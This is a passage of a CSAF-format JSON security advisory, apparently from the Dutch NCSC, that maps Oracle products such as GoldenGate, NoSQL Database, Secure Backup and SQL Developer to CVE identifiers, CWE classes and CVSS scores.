"cpe": "cpe:2.3:a:oracle:goldengate:19.1.0.0.0-19.23.0.0.240716:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-485902",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:19.1.0.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-1503736",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:19.23.0.0.240716:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-219912",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:19c:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-1503739",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:21.14:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-1650765",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:21.3-21.14:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-1503738",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:21.3:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_goldengate_stream_analytics",
"product": {
"name": "oracle_goldengate_stream_analytics",
"product_id": "CSAFPID-1650515",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_goldengate_stream_analytics:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "management_pack_for__goldengate",
"product": {
"name": "management_pack_for__goldengate",
"product_id": "CSAFPID-764861",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:management_pack_for__goldengate:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "management_pack_for__goldengate",
"product": {
"name": "management_pack_for__goldengate",
"product_id": "CSAFPID-1503640",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_goldengate_studio",
"product": {
"name": "oracle_goldengate_studio",
"product_id": "CSAFPID-1650835",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_goldengate_studio:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_goldengate",
"product": {
"name": "oracle_goldengate",
"product_id": "CSAFPID-1650575",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_goldengate:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-764813",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1503661",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1503663",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1673497",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:1.5.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-764764",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-764765",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1673491",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:20.3.40:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-764766",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1673495",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:21.2.71:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-764767",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1673493",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:22.3.45:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1673489",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:23.3.33:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1673488",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:24.1.17:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1650757",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:prior_to_19.5.42:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1650758",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:prior_to_20.3.40:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1650761",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:prior_to_21.2.27:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1650760",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:prior_to_22.3.46:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "nosql_database",
"product": {
"name": "nosql_database",
"product_id": "CSAFPID-1650759",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:nosql_database:prior_to_23.3.32:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_nosql_database",
"product": {
"name": "oracle_nosql_database",
"product_id": "CSAFPID-1650584",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_nosql_database:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_secure_backup",
"product": {
"name": "oracle_secure_backup",
"product_id": "CSAFPID-1650563",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_secure_backup:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "secure_backup",
"product": {
"name": "secure_backup",
"product_id": "CSAFPID-667692",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "secure_backup",
"product": {
"name": "secure_backup",
"product_id": "CSAFPID-345049",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "secure_backup",
"product": {
"name": "secure_backup",
"product_id": "CSAFPID-611417",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "secure_backup",
"product": {
"name": "secure_backup",
"product_id": "CSAFPID-1673422",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:secure_backup:19.1.0.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_sql_developer",
"product": {
"name": "oracle_sql_developer",
"product_id": "CSAFPID-1650638",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_sql_developer:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sql_developer",
"product": {
"name": "sql_developer",
"product_id": "CSAFPID-764822",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sql_developer",
"product": {
"name": "sql_developer",
"product_id": "CSAFPID-220643",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sql_developer",
"product": {
"name": "sql_developer",
"product_id": "CSAFPID-816870",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sql_developer",
"product": {
"name": "sql_developer",
"product_id": "CSAFPID-816871",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sql_developer",
"product": {
"name": "sql_developer",
"product_id": "CSAFPID-1673397",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*"
}
}
}
],
"category": "vendor",
"name": "oracle"
},
{
"branches": [
{
"category": "product_name",
"name": "oracle_application_express",
"product": {
"name": "oracle_application_express",
"product_id": "CSAFPID-1673144",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle_corporation:oracle_application_express:24.1:*:*:*:*:*:*:*"
}
}
}
],
"category": "vendor",
"name": "oracle_corporation"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-1471",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"notes": [
{
"category": "other",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-220886",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764822",
"CSAFPID-1650515",
"CSAFPID-1650638",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-89587",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-1471",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-1471.json"
}
],
"title": "CVE-2022-1471"
},
{
"cve": "CVE-2022-34169",
"cwe": {
"id": "CWE-192",
"name": "Integer Coercion Error"
},
"notes": [
{
"category": "other",
"text": "Integer Coercion Error",
"title": "CWE-192"
},
{
"category": "other",
"text": "Incorrect Conversion between Numeric Types",
"title": "CWE-681"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-342816",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-764752",
"CSAFPID-764275",
"CSAFPID-764861",
"CSAFPID-266119",
"CSAFPID-187448",
"CSAFPID-219912",
"CSAFPID-765238",
"CSAFPID-765239",
"CSAFPID-765259",
"CSAFPID-667692",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-764250",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-1673384",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-34169",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-34169.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-342816",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-764752",
"CSAFPID-764275",
"CSAFPID-764861",
"CSAFPID-266119",
"CSAFPID-187448",
"CSAFPID-219912",
"CSAFPID-765238",
"CSAFPID-765239",
"CSAFPID-765259",
"CSAFPID-667692",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-764250",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-1673384",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2022-34169"
},
{
"cve": "CVE-2022-36033",
"cwe": {
"id": "CWE-87",
"name": "Improper Neutralization of Alternate XSS Syntax"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Alternate XSS Syntax",
"title": "CWE-87"
},
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-220886",
"CSAFPID-94075",
"CSAFPID-764803",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764861",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-266119",
"CSAFPID-187448",
"CSAFPID-1650515",
"CSAFPID-1650835",
"CSAFPID-219912",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-667692",
"CSAFPID-1673384",
"CSAFPID-912561",
"CSAFPID-1503575",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-912567",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-36033",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-36033.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-220886",
"CSAFPID-94075",
"CSAFPID-764803",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764861",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-266119",
"CSAFPID-187448",
"CSAFPID-1650515",
"CSAFPID-1650835",
"CSAFPID-219912",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-667692",
"CSAFPID-1673384",
"CSAFPID-912561",
"CSAFPID-1503575",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-912567",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2022-36033"
},
{
"cve": "CVE-2022-37454",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"notes": [
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "other",
"text": "Integer Overflow to Buffer Overflow",
"title": "CWE-680"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-1650563",
"CSAFPID-89587",
"CSAFPID-764861"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-37454",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-37454.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
"version": "3.1"
},
"products": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-1650563",
"CSAFPID-89587",
"CSAFPID-764861"
]
}
],
"title": "CVE-2022-37454"
},
{
"cve": "CVE-2022-38136",
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-38136",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-38136.json"
}
],
"title": "CVE-2022-38136"
},
{
"cve": "CVE-2022-40196",
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-40196",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-40196.json"
}
],
"title": "CVE-2022-40196"
},
{
"cve": "CVE-2022-41342",
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-41342",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-41342.json"
}
],
"title": "CVE-2022-41342"
},
{
"cve": "CVE-2022-42919",
"cwe": {
"id": "CWE-311",
"name": "Missing Encryption of Sensitive Data"
},
"notes": [
{
"category": "other",
"text": "Missing Encryption of Sensitive Data",
"title": "CWE-311"
},
{
"category": "other",
"text": "Improper Privilege Management",
"title": "CWE-269"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-42919",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-42919.json"
}
],
"title": "CVE-2022-42919"
},
{
"cve": "CVE-2022-45061",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Inefficient Algorithmic Complexity",
"title": "CWE-407"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-45061",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-45061.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-342816",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764779",
"CSAFPID-94075",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-611390",
"CSAFPID-764803",
"CSAFPID-764813",
"CSAFPID-764822",
"CSAFPID-89587"
]
}
],
"title": "CVE-2022-45061"
},
{
"cve": "CVE-2022-46337",
"product_status": {
"known_affected": [
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-1673384",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-764752",
"CSAFPID-764275",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-764250",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-342816",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-816361",
"CSAFPID-764813",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-46337",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-46337.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-1673384",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-764752",
"CSAFPID-764275",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-912046",
"CSAFPID-912045",
"CSAFPID-912044",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-764250",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-342816",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-816361",
"CSAFPID-764813",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692"
]
}
],
"title": "CVE-2022-46337"
},
{
"cve": "CVE-2023-2976",
"cwe": {
"id": "CWE-552",
"name": "Files or Directories Accessible to External Parties"
},
"notes": [
{
"category": "other",
"text": "Files or Directories Accessible to External Parties",
"title": "CWE-552"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1650584",
"CSAFPID-1650835",
"CSAFPID-1650506",
"CSAFPID-1650515",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-342816",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-764813",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692",
"CSAFPID-89587",
"CSAFPID-1673397",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-345049",
"CSAFPID-816801",
"CSAFPID-611390",
"CSAFPID-611394",
"CSAFPID-611417",
"CSAFPID-764250",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-2976",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-2976.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1650584",
"CSAFPID-1650835",
"CSAFPID-1650506",
"CSAFPID-1650515",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-342816",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816361",
"CSAFPID-764813",
"CSAFPID-220643",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692",
"CSAFPID-89587",
"CSAFPID-1673397",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-345049",
"CSAFPID-816801",
